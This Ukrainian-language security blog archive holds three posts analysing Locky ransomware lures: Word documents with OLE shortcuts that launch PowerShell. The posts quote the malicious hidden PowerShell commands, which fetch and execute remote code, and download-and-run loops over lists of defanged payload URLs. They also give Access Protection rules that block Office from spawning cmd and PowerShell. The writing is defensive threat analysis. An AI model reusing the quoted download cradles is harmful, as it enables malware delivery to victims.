Tag Archive | W97MMacroLess

%random%.doc > OLE(ps) > wera4.exe

Отримав на аналіз черговий зразок документу із OLE у вигляді ярлика на powershell.

Незважаючи на той факт, що даний зразок не був націлений на українські системи – в котре наголошую, що через певний час тактику застосування таких документів (тільки локалізованих та з іншими зображеннями) візьмуть на озброєння зловмисники, що будуть атакувати українські організації. Тому, будьте ласкаві, перевірте ще раз  – чи вжили ви необхідних заходів, аби активація такої приманки не залежала від людського фактору і була блокована одним із наведених методів у розділі “Контрзаходи”

Навіть зображення не змінили:

При активації в %temp% записується 4.lnk який містить такий рядок:

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -nop -w hidden -c "$rv=[System.Uri]'h11p:\\with-hair[.]co.jp/693';$dx=(new-object IO.StreamReader((([Net.WebRequest]::Create($rv)).GetResponse()).GetResponseStream())).ReadToEnd();IEX $dx;"

Якщо жертва активує вбудований об’єкт процес Winword передає керування на powershell, що призводить до отримання списку адрес (необфускований)

Перелік із 6 URL по даній кампанії (завантаження проміжного payload який довантажує Locky)

$cpknos = "h11p:\\teesaddiction[.]com/JHgd3Dees","h11p:\\christaminiatures[.]nl/JHgd3Dees","h11p:\\336.linux1.testsider[.]dk/JHgd3Dees","h11p:\\florastor[.]net/JHgd3Dees","h11p:\\heinzig[.]info/JHgd3Dees","h11p:\\muchinfaket[.]net/p66/JHgd3Dees"
$cpknos = $cpknos | Sort-Object {Get-Random}
foreach($cpkno in $cpknos){
Try{
Write-Host $cpkno
$scpm = "$env:temp\wera4.exe"
Write-Host $scpm
$dum = (New-Object System[.]net.WebClient)
$dum.DownloadFile([System.Uri]$cpkno, $scpm)
Start-Process $scpm
break
}Catch{}}

Результат активації

Dropper та проміжний payload детектуються McAfee

Контрзаходи:

(такі самі як у попередньому аналізі)

Будьте уважні та обережні!

VR

OLE(ps) замість DDE

загадка:

не DDE, не макрос, а powershell викликає..

Доставку Locky почали здійснювати за допомогою OLE, де в якості об’єкту – ярлик на Powershell.

Важливий момент – в цьому випадку оновлення MS, деактивація DDE від таких файлів не захищає, бо це старе OLE. Інший механізм.

У кого було блокування створення .exe в профілі або хоча би %temp% – захищені

У кого були обидва правила на дочірні процеси – і на CMD і на Powershellзахищені

Усім іншим поки що повезло, бо проміжний downloader не завантажував основну частину на системи українського сегменту. Поки що.

В котре наголошую, що на фоні масових розсилок, які поки що не шкодять, в окремих цільових атаках можуть застосовуватися схожі, але вже локалізовані документи – із різними типами начинки як DDE, так і OLE, macros.

Схема атаки:

email > .doc (OLE - LNK - PS) > запитання1? > powershell > GET URL list > GET payload1 > %temp%\*1.exe > GET encoded payload2 > %temp%\*2.exe

* Із схеми викинули проміжне звернення до CMD, команди на завантаження переліку адрес іде напряму з winword на powershell

Принцип дії простий – при відкритті документу жертва бачить прохання клікнути двічі на зображенні

(зображення може бути інакшим – не прив’язуйтеся саме до цієї картинки!)

Подвійний клік спричиняє активацію OLE який видобуває в %tmp% ярлик на виклик powershell із зашитим рядком URL.

Далі усе як раніше. Тільки цього разу без проміжного звернення до cmd.

Контрзаходи:

1) Переконайтеся, що застосували правила для cmd і powershell

2) Блокування доступу до Internet для Powershell (варіант #1)

3) Блокування створення .exe в %temp%

Приклад спрацювання правила на запуск дочірніх процесів:

Маркери компрометації:

Файли з двох різних кампаній.

Invoice INV0000252

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -nop -w hidden -c IEX ((new-object net.webclient).downloadstring([System.Uri]'h11p:\cornertape.net/eiuhf384'))

443051465

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -nop -w hidden -c IEX ((new-object net.webclient).downloadstring([System.Uri]'h11p:\hispanic-models.com/kjsdch7346'))

За посиланням  – некодований набір інструкцій (їм стало ліньки робити обфускації у проганяти через base64)

Зверніть увагу – запис проміжного payload (downloader) у каталог %temp%

$us = "h11p:\ingress.kannste.net/JHGbdc34","h11p:\givagarden.com/JHGbdc34","h11p:\hotelruota.it/JHGbdc34","h11p:\internet-webshops.de/JHGbdc34","h11p:\hilaryandsavio.com/JHGbdc34","h11p:\cirad.or.id/JHGbdc34"
foreach($u in $us){
Try{
Write-Host $u
$f = "$env:temp\h8.exe"
Write-Host $f
$w = New-Object System.Net.WebClient
$w.DownloadFile($u, $f)
Start-Process $f
break
}Catch{}}

Будьте уважні та обережні!

VR

AP vs DDE & macros

Доброго вечора, панове.

Ми продовжуємо фіксувати активні спроби по доставці шкідливого коду через документи із DDE.

Не дивлячись на те, що поки це відлуння кампаній, payload яких націлені на інші країни,

ми повинні бути готовими до спроби використання DDE у цільових атаках на українські організації.

Також, варто звернути увагу, що експлуатація DDE поширюється не лише на Word та Excel, але й на Outlook (запрошення або пересилка повідомлення) та PowerPoint.

 

Вирішив поділитися з вами прикладами правил Access Protection для захисту від DDE та макросів.

Мої політики є оптимізованою версією запропонованих інженерами McAfee і будуть корисні перш за все користувачам McAfee VSE/ENS.

Але, якщо у вас в організації впроваджено інше рішення для захисту кінцевих точок – спробуйте реалізувати по аналогії.

Для тих, хто вже реалізував захист за рахунок групових політик – переконайтеся, що ви врахували усі шляхи (system32, sysWOW64).

 

Чому виникає потреба дописати пару додаткових правил?

Я вже давно рекомендую блокувати створення та запуск нових *.exe файлів у каталозі профілю. Це універсальний захист від 90% атак.

Але таке правило підходить далеко не всім, тому ось вам приклад як заблокувати спробу довантаження шкідливого коду через DDE або макрос у документі.

Нагадую принцип активації приманки DDE/macros

Схема атаки DDE/macro_powershell:

email > .doc > WINWORD > CMD > powershell > GET ... > %temp%\*.exe

Головна ідея правил, які я хочу вам запропонувати, це блокувати запуск дочірніх процесів для додатків MS Office.

Правила Access Protection:

Перше правило забороняє додаткам MS Office виклик CMD.exe

За нормальних умов створення/редагування документу не повинне призводити до передачі команд на CMD.

(!) важливий момент – зверніть увагу, що додатки можуть бути прописані по імені, а процес, який забороняємо викликати – через Sys* (щоб врахувати обидва каталоги)

Зауважте також, що це правило дозволяє блокувати макроси націлені на виклик не лише powershell але й WSCript.exe (якщо ви не дезактивували його через реєстр)

Правило #1 для VSE

Name: _DDE_BLK1(cmd) 
Process to include: EXCEL.EXE, OUTLOOK.EXE, POWERPNT.EXE, WINWORD.EXE
Processes to exclude: -
File or folder name to block: C:\Windows\Sys*\cmd.exe
File actions to prevent:
+ Read
+ Write
+ Execute

Друге правило про всяк випадок, якщо буде знайдено спосіб виклику PowerShell без залучення CMD.

(!) знову важливий момент – а процес, який забороняємо викликати – через повний шлях із двома символами підстановки * (щоб врахувати обидва каталоги sys та різні версії)

Правило #2 для VSE

Name: _DDE_BLK_2(ps)
Process to include: EXCEL.EXE, OUTLOOK.EXE, POWERPNT.EXE, WINWORD.EXE
Processes to exclude: -
File or folder name to block: C:\Windows\Sys*\WindowsPowerShell\*\powershell.exe
File actions to prevent:
+ Read
+ Write
+ Execute

Одне правило для ENS

Name:  _DDE_BLK
Executables: EXCEL.EXE, OUTLOOK.EXE, POWERPNT.EXE, WINWORD.EXE
Subrule: _BLK_child_proc 
Operations:
+ Write
+ Execute
+ Read
Targets: (include)
C:\Windows\Sys*\cmd.exe
C:\Windows\Sys*\WindowsPowerShell\*\powershell.exe

Також нагадую інші способи захисту від використання приманок типу MS Office:

  1. Деактивувати оновлення посилань (DDE) – (DWORD) DontUpdateLinks = 1 (HCU\Software\Microsoft\Office\xx\Word\Options\)
  2. Заборонити процесам MS Office створювати дочірні процеси крім кількох довірених (політики ENS ATP – DAC)
  3. Заборонити для процесів PowerShell доступ до мережі Інтернет (по аналогії із першим варіантом) – але цього не буде достатньо якщо powershell викинуть із схеми
  4. Заборонити створення та зчитування/запуску *.EXE з каталогів профілю користувача %appdata% (політики VSE/ENS – Access Protection)

Будьте уважні та обережні!

VR